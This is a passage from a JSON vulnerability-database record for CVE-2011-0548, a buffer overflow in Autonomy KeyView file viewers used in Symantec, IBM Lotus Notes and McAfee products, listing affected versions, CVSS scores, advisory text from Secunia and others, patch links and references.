"model": "data loss prevention detection servers for linux",
"scope": "eq",
"trust": 0.3,
"vendor": "symantec",
"version": "8.1.5.15"
},
{
"model": "data loss prevention detection servers for linux",
"scope": "eq",
"trust": 0.3,
"vendor": "symantec",
"version": "8.1"
},
{
"model": "data loss prevention detection servers for linux",
"scope": "eq",
"trust": 0.3,
"vendor": "symantec",
"version": "11.0"
},
{
"model": "data loss prevention detection servers for linux",
"scope": "eq",
"trust": 0.3,
"vendor": "symantec",
"version": "10.5"
},
{
"model": "data loss prevention detection servers for linux",
"scope": "eq",
"trust": 0.3,
"vendor": "symantec",
"version": "10.0"
},
{
"model": "brightmail gateway series appliance",
"scope": "eq",
"trust": 0.3,
"vendor": "symantec",
"version": "83000"
},
{
"model": "brightmail gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "symantec",
"version": "9.0.2"
},
{
"model": "brightmail gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "symantec",
"version": "8.0.2"
},
{
"model": "brightmail gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "symantec",
"version": "8.0.1"
},
{
"model": "brightmail gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "symantec",
"version": "9.0"
},
{
"model": "brightmail gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "symantec",
"version": "8.0"
},
{
"model": "brightmail and messaging gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "symantec",
"version": "9.5"
},
{
"model": "host data loss prevention",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "9.2"
},
{
"model": "host data loss prevention",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "9.1"
},
{
"model": "lotus notes",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5.2"
},
{
"model": "lotus notes",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5.1"
},
{
"model": "lotus notes",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0.3"
},
{
"model": "lotus notes",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0.2"
},
{
"model": "lotus notes",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0.1"
},
{
"model": "lotus notes",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.5.6"
},
{
"model": "lotus notes",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.5.5"
},
{
"model": "lotus notes",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.5.4"
},
{
"model": "lotus notes",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.5.3"
},
{
"model": "lotus notes",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.5.2"
},
{
"model": "lotus notes",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.5.1"
},
{
"model": "lotus notes",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.5"
},
{
"model": "lotus notes",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5"
},
{
"model": "lotus notes",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0"
},
{
"model": "lotus notes fp2",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0.2"
},
{
"model": "lotus notes fp1",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0.2"
},
{
"model": "lotus notes",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0"
},
{
"model": "lotus notes fp2",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.5.6"
},
{
"model": "lotus notes fp3",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.5.5"
},
{
"model": "lotus notes fp2",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.5.5"
},
{
"model": "lotus notes fp1",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.5.2"
},
{
"model": "keyview viewer sdk",
"scope": "eq",
"trust": 0.3,
"vendor": "autonomy",
"version": "10.4"
},
{
"model": "keyview viewer sdk",
"scope": "eq",
"trust": 0.3,
"vendor": "autonomy",
"version": "10.3"
},
{
"model": "keyview viewer sdk",
"scope": "eq",
"trust": 0.3,
"vendor": "autonomy",
"version": "9.2"
},
{
"model": "keyview viewer sdk",
"scope": "eq",
"trust": 0.3,
"vendor": "autonomy",
"version": "10.9"
},
{
"model": "keyview viewer sdk",
"scope": "eq",
"trust": 0.3,
"vendor": "autonomy",
"version": "10.8"
},
{
"model": "keyview viewer sdk",
"scope": "eq",
"trust": 0.3,
"vendor": "autonomy",
"version": "10.5"
},
{
"model": "keyview viewer sdk",
"scope": "eq",
"trust": 0.3,
"vendor": "autonomy",
"version": "10.12"
},
{
"model": "keyview viewer sdk",
"scope": "eq",
"trust": 0.3,
"vendor": "autonomy",
"version": "10.11"
},
{
"model": "keyview viewer sdk",
"scope": "eq",
"trust": 0.3,
"vendor": "autonomy",
"version": "10.10"
},
{
"model": "keyview viewer sdk",
"scope": "eq",
"trust": 0.3,
"vendor": "autonomy",
"version": "10"
},
{
"model": "keyview idol",
"scope": "eq",
"trust": 0.3,
"vendor": "autonomy",
"version": "10"
},
{
"model": "keyview filter sdk",
"scope": "eq",
"trust": 0.3,
"vendor": "autonomy",
"version": "10.9"
},
{
"model": "keyview filter sdk",
"scope": "eq",
"trust": 0.3,
"vendor": "autonomy",
"version": "10.4"
},
{
"model": "keyview filter sdk",
"scope": "eq",
"trust": 0.3,
"vendor": "autonomy",
"version": "10.3"
},
{
"model": "keyview filter sdk",
"scope": "eq",
"trust": 0.3,
"vendor": "autonomy",
"version": "9.2"
},
{
"model": "keyview filter sdk",
"scope": "eq",
"trust": 0.3,
"vendor": "autonomy",
"version": "10.8"
},
{
"model": "keyview filter sdk",
"scope": "eq",
"trust": 0.3,
"vendor": "autonomy",
"version": "10.5"
},
{
"model": "keyview filter sdk",
"scope": "eq",
"trust": 0.3,
"vendor": "autonomy",
"version": "10.12"
},
{
"model": "keyview filter sdk",
"scope": "eq",
"trust": 0.3,
"vendor": "autonomy",
"version": "10.11"
},
{
"model": "keyview filter sdk",
"scope": "eq",
"trust": 0.3,
"vendor": "autonomy",
"version": "10.10"
},
{
"model": "keyview filter sdk",
"scope": "eq",
"trust": 0.3,
"vendor": "autonomy",
"version": "10"
},
{
"model": "keyview export sdk",
"scope": "eq",
"trust": 0.3,
"vendor": "autonomy",
"version": "10.4"
},
{
"model": "keyview export sdk",
"scope": "eq",
"trust": 0.3,
"vendor": "autonomy",
"version": "10.3"
},
{
"model": "keyview export sdk",
"scope": "eq",
"trust": 0.3,
"vendor": "autonomy",
"version": "9.2"
},
{
"model": "keyview export sdk",
"scope": "eq",
"trust": 0.3,
"vendor": "autonomy",
"version": "10.9"
},
{
"model": "keyview export sdk",
"scope": "eq",
"trust": 0.3,
"vendor": "autonomy",
"version": "10.8"
},
{
"model": "keyview export sdk",
"scope": "eq",
"trust": 0.3,
"vendor": "autonomy",
"version": "10.5"
},
{
"model": "keyview export sdk",
"scope": "eq",
"trust": 0.3,
"vendor": "autonomy",
"version": "10.12"
},
{
"model": "keyview export sdk",
"scope": "eq",
"trust": 0.3,
"vendor": "autonomy",
"version": "10.10"
},
{
"model": "keyview export sdk",
"scope": "eq",
"trust": 0.3,
"vendor": "autonomy",
"version": "10"
},
{
"model": "messaging gateway",
"scope": "ne",
"trust": 0.3,
"vendor": "symantec",
"version": "9.5.1"
},
{
"model": "mail security for microsoft exchange",
"scope": "ne",
"trust": 0.3,
"vendor": "symantec",
"version": "6.5.5"
},
{
"model": "mail security for microsoft exchange",
"scope": "ne",
"trust": 0.3,
"vendor": "symantec",
"version": "6.0.12"
},
{
"model": "mail security for domino",
"scope": "ne",
"trust": 0.3,
"vendor": "symantec",
"version": "8.0.8"
},
{
"model": "mail security for domino",
"scope": "ne",
"trust": 0.3,
"vendor": "symantec",
"version": "7.5.11"
},
{
"model": "data loss prevention endpoint agents",
"scope": "ne",
"trust": 0.3,
"vendor": "symantec",
"version": "11.1"
},
{
"model": "data loss prevention endpoint agents",
"scope": "ne",
"trust": 0.3,
"vendor": "symantec",
"version": "10.5.3"
},
{
"model": "data loss prevention detection servers for windows",
"scope": "ne",
"trust": 0.3,
"vendor": "symantec",
"version": "11.1"
},
{
"model": "data loss prevention detection servers for windows",
"scope": "ne",
"trust": 0.3,
"vendor": "symantec",
"version": "10.5.3"
},
{
"model": "data loss prevention detection servers for linux",
"scope": "ne",
"trust": 0.3,
"vendor": "symantec",
"version": "11.1"
},
{
"model": "data loss prevention detection servers for linux",
"scope": "ne",
"trust": 0.3,
"vendor": "symantec",
"version": "10.5.3"
},
{
"model": "keyview idol",
"scope": "ne",
"trust": 0.3,
"vendor": "autonomy",
"version": "10.13.1"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#126159"
},
{
"db": "BID",
"id": "48013"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-001718"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-001933"
},
{
"db": "CNNVD",
"id": "CNNVD-201106-004"
},
{
"db": "NVD",
"id": "CVE-2011-0548"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:autonomy:autonomy_keyview_idol",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2011-001718"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Secunia",
"sources": [
{
"db": "PACKETSTORM",
"id": "102365"
},
{
"db": "PACKETSTORM",
"id": "102187"
},
{
"db": "PACKETSTORM",
"id": "101914"
},
{
"db": "PACKETSTORM",
"id": "102081"
},
{
"db": "PACKETSTORM",
"id": "115865"
}
],
"trust": 0.5
},
"cve": "CVE-2011-0548",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 9.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.6,
"id": "CVE-2011-0548",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.8,
"vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CARNEGIE MELLON",
"availabilityImpact": "PARTIAL",
"availabilityRequirement": "NOT DEFINED",
"baseScore": 9.0,
"collateralDamagePotential": "NOT DEFINED",
"confidentialityImpact": "COMPLETE",
"confidentialityRequirement": "NOT DEFINED",
"enviromentalScore": 7.4,
"exploitability": "FUNCTIONAL",
"exploitabilityScore": 8.6,
"id": "VU#126159",
"impactScore": 9.5,
"integrityImpact": "COMPLETE",
"integrityRequirement": "NOT DEFINED",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"remediationLevel": "OFFICIAL FIX",
"reportConfidence": "CONFIRMED",
"severity": "HIGH",
"targetDistribution": "NOT DEFINED",
"trust": 0.8,
"userInteractionRequired": null,
"vector_string": "AV:N/AC:M/Au:N/C:C/I:C/A:P",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 9.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.6,
"id": "VHN-48493",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2011-0548",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#126159",
"trust": 0.8,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2011-0548",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-201106-004",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-48493",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#126159"
},
{
"db": "VULHUB",
"id": "VHN-48493"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-001933"
},
{
"db": "CNNVD",
"id": "CNNVD-201106-004"
},
{
"db": "NVD",
"id": "CVE-2011-0548"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Buffer overflow in the Lotus Freelance Graphics PRZ file viewer in Autonomy KeyView, as used in Symantec Mail Security (SMS) 6.x through 8.x, Symantec Brightmail and Messaging Gateway before 9.5.1, and Symantec Data Loss Prevention (DLP) before 10.5.3 and 11.x before 11.1, allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted .prz file. NOTE: this may overlap CVE-2011-1217. Autonomy KeyView IDOL Contains multiple vulnerabilities in file decoding. Autonomy Provided by Autonomy KeyView IDOL Is 1000 A library that decodes the above file formats. IBM Lotus Notes , Lotus Domino , Symantec Mail Security , Hyland OnBase Used in such applications. Autonomy KeyView IDOL Contains multiple vulnerabilities in file decoding.Although the impact will vary depending on the application, service operation may be interrupted by opening a specially crafted file. (DoS) An attacker may be attacked or execute arbitrary code with user privileges. Autonomy KeyView Filter is prone to a buffer-overflow vulnerability because of a failure to properly bounds check user-supplied input. \nAn attacker can exploit this issue by enticing an unsuspecting victim to open a malicious file or email attachment. Failed exploit attempts will result in a denial-of-service condition. \nNOTE: This issue was previously discussed in BID 47962 (IBM Lotus Notes Attachment Handling Multiple Buffer Overflow Vulnerabilities) but has been given its own record to better document it. KeyView is a software package for exporting, converting and viewing files in various formats. \n\nFor more information:\nSA44820\n\nSOLUTION:\nDo not open documents from untrusted sources. \n\nFor more information:\nSA44820\n\nSuccessful exploitation requires the attachment content scanning\noption to be enabled. \n\nSOLUTION:\nDisable the attachment content scanning option. ----------------------------------------------------------------------\n\n\nAlerts when vulnerabilities pose a threat to your infrastructure\nThe enhanced reporting module of the Secunia Vulnerability Intelligence Manager (VIM) enables you to combine advisory and ticket information, and generate policy compliance statistics. Using your asset list preferences, customised notifications are issued as soon as a new vulnerability is discovered - a valuable tool for documenting mitigation strategies. \n\nFor more information see vulnerability #6 in:\nSA44624\n\nPlease see the vendor\u0027s advisory for the list for affected products. ----------------------------------------------------------------------\n\n\nJoin Secunia @ FIRST Conference, 12-17 June, Hilton Vienna, Austria\nSee to the presentation \"The Dynamics and Threats of End-Point Software Portfolios\" by Secunia\u0027s Research Analyst Director, Stefan Frei. \nRead more:\nhttp://conference.first.org/ \n\n\n----------------------------------------------------------------------\n\nTITLE:\nAutonomy KeyView File Processing Vulnerabilities\n\nSECUNIA ADVISORY ID:\nSA44820\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/44820/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=44820\n\nRELEASE DATE:\n2011-06-08\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/44820/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/44820/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=44820\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nMultiple vulnerabilities have been reported in Autonomy KeyView,\nwhich can be exploited by malicious people to compromise a vulnerable\nsystem. \n\n1) An error when processing Windows Write (WRI) files can be\nexploited to cause a stack-based buffer overflow. \n\n2) Some errors when processing unspecified file formats can be\nexploited to corrupt memory. No further information is currently\navailable. \n\nThe vulnerabilities are reported in versions prior to 10.13.1. \n\nSOLUTION:\nUpdate to version 10.13.1. \n\nPROVIDED AND/OR DISCOVERED BY:\nWill Dormann and Jared Allar, CERT/CC. \n\nORIGINAL ADVISORY:\nUS-CERT (VU#126159):\nhttp://www.kb.cert.org/vuls/id/126159\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2011-0548"
},
{
"db": "CERT/CC",
"id": "VU#126159"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-001718"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-001933"
},
{
"db": "BID",
"id": "48013"
},
{
"db": "VULHUB",
"id": "VHN-48493"
},
{
"db": "PACKETSTORM",
"id": "102365"
},
{
"db": "PACKETSTORM",
"id": "102187"
},
{
"db": "PACKETSTORM",
"id": "101914"
},
{
"db": "PACKETSTORM",
"id": "102081"
},
{
"db": "PACKETSTORM",
"id": "115865"
}
],
"trust": 3.87
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.kb.cert.org/vuls/id/126159",
"trust": 0.8,
"type": "unknown"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#126159"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2011-0548",
"trust": 2.8
},
{
"db": "SECUNIA",
"id": "44779",
"trust": 2.6
},
{
"db": "SECTRACK",
"id": "1025596",
"trust": 2.5
},
{
"db": "SECTRACK",
"id": "1025594",
"trust": 2.5
},
{
"db": "SECTRACK",
"id": "1025595",
"trust": 2.5
},
{
"db": "CERT/CC",
"id": "VU#126159",
"trust": 2.3
},
{
"db": "BID",
"id": "48013",
"trust": 1.1
},
{
"db": "JVNDB",
"id": "JVNDB-2011-001718",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2011-001933",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201106-004",
"trust": 0.7
},
{
"db": "MCAFEE",
"id": "SB10024",
"trust": 0.4
},
{
"db": "SECUNIA",
"id": "50399",
"trust": 0.3
},
{
"db": "SECUNIA",
"id": "44877",
"trust": 0.2
},
{
"db": "SECUNIA",
"id": "44878",
"trust": 0.2
},
{
"db": "SECUNIA",
"id": "44820",
"trust": 0.2
},
{
"db": "VULHUB",
"id": "VHN-48493",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "102365",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "102187",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "101914",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "102081",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "115865",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#126159"
},
{
"db": "VULHUB",
"id": "VHN-48493"
},
{
"db": "BID",
"id": "48013"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-001718"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-001933"
},
{
"db": "PACKETSTORM",
"id": "102365"
},
{
"db": "PACKETSTORM",
"id": "102187"
},
{
"db": "PACKETSTORM",
"id": "101914"
},
{
"db": "PACKETSTORM",
"id": "102081"
},
{
"db": "PACKETSTORM",
"id": "115865"
},
{
"db": "CNNVD",
"id": "CNNVD-201106-004"
},
{
"db": "NVD",
"id": "CVE-2011-0548"
}
]
},
"id": "VAR-201107-0115",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-48493"
}
],
"trust": 0.6
},
"last_update_date": "2025-04-11T21:25:49.461000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "KeyView IDOL \u0026 Connectors",
"trust": 0.8,
"url": "http://www.autonomy.com/content/Products/idol-modules-connectors/index.en.html"
},
{
"title": "Information Connectivity",
"trust": 0.8,
"url": "http://www.autonomy.com/content/Technology/idol-functionality-information-connectivity/index.en.html"
},
{
"title": "Autonomy Support Site",
"trust": 0.8,
"url": "https://customers.autonomy.com/"
},
{
"title": "SYM11-007",
"trust": 0.8,
"url": "http://www.symantec.com/business/security_response/securityupdates/detail.jsp?fid=security_advisory\u0026pvid=security_advisory\u0026year=2011\u0026suid=20110531_00"
},
{
"title": "SYM11-007",
"trust": 0.8,
"url": "http://www.symantec.com/ja/jp/security_response/securityupdates/detail.jsp?fid=security_advisory\u0026pvid=security_advisory\u0026year=2011\u0026suid=20110531_00"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2011-001718"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-001933"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-119",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-48493"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-001933"
},
{
"db": "NVD",
"id": "CVE-2011-0548"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "http://securitytracker.com/id?1025594"
},
{
"trust": 2.5,
"url": "http://securitytracker.com/id?1025595"
},
{
"trust": 2.5,
"url": "http://securitytracker.com/id?1025596"
},
{
"trust": 2.5,
"url": "http://secunia.com/advisories/44779"
},
{
"trust": 1.5,
"url": "http://www.kb.cert.org/vuls/id/126159"
},
{
"trust": 1.0,
"url": "http://www.symantec.com/business/security_response/securityupdates/detail.jsp?fid=security_advisory\u0026pvid=security_advisory\u0026year=2011\u0026suid=20110531_00"
},
{
"trust": 1.0,
"url": "http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory\u0026pvid=security_advisory\u0026year=2011\u0026suid=20110531_00"
},
{
"trust": 0.8,
"url": "http://www.autonomy.com/content/products/idol-modules-connectors/index.en.html"
},
{
"trust": 0.8,
"url": "http://www.autonomy.com/content/technology/idol-functionality-information-connectivity/index.en.html"
},
{
"trust": 0.8,
"url": "https://customers.autonomy.com"
},
{
"trust": 0.8,
"url": "http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory\u0026pvid=security_advisory\u0026suid=20111006_00"
},
{
"trust": 0.8,
"url": "http://jvn.jp/cert/jvnvu126159"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-0548"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2011-0548"
},
{
"trust": 0.8,
"url": "http://www.securityfocus.com/bid/48013"
},
{
"trust": 0.5,
"url": "http://secunia.com/advisories/secunia_security_advisories/"
},
{
"trust": 0.5,
"url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/"
},
{
"trust": 0.5,
"url": "http://secunia.com/vulnerability_scanning/personal/"
},
{
"trust": 0.5,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.5,
"url": "http://secunia.com/advisories/about_secunia_advisories/"
},
{
"trust": 0.4,
"url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10024"
},
{
"trust": 0.4,
"url": "http://secunia.com/vulnerability_intelligence/"
},
{
"trust": 0.3,
"url": "http://www-01.ibm.com/software/lotus/products/notes/"
},
{
"trust": 0.3,
"url": "http://www.autonomy.com/content/products/keyview/index.en.html"
},
{
"trust": 0.3,
"url": "https://www-304.ibm.com/support/docview.wss?uid=swg21500034"
},
{
"trust": 0.3,
"url": "http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=913"
},
{
"trust": 0.3,
"url": "http://conference.first.org/"
},
{
"trust": 0.1,
"url": "http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory\u0026amp;pvid=security_advisory\u0026amp;year=2011\u0026amp;suid=20110531_00"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/44877/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/44877/#comments"
},
{
"trust": 0.1,
"url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=44877"
},
{
"trust": 0.1,
"url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=44878"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/44878/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/44878/#comments"
},
{
"trust": 0.1,
"url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=44779"
},
{
"trust": 0.1,
"url": "http://secunia.com/products/corporate/evm/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/44779/"
},
{
"trust": 0.1,
"url": "http://www.youtube.com/user/secunia#p/a/u/0/m1y9sjqr2sy"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/44779/#comments"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/44820/#comments"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/44820/"
},
{
"trust": 0.1,
"url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=44820"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/50399/"
},
{
"trust": 0.1,
"url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=50399"
},
{
"trust": 0.1,
"url": "http://secunia.com/csi6beta"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/50399/#comments"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#126159"
},
{
"db": "VULHUB",
"id": "VHN-48493"
},
{
"db": "BID",
"id": "48013"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-001718"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-001933"
},
{
"db": "PACKETSTORM",
"id": "102365"
},
{
"db": "PACKETSTORM",
"id": "102187"
},
{
"db": "PACKETSTORM",
"id": "101914"
},
{
"db": "PACKETSTORM",
"id": "102081"
},
{
"db": "PACKETSTORM",
"id": "115865"
},
{
"db": "CNNVD",
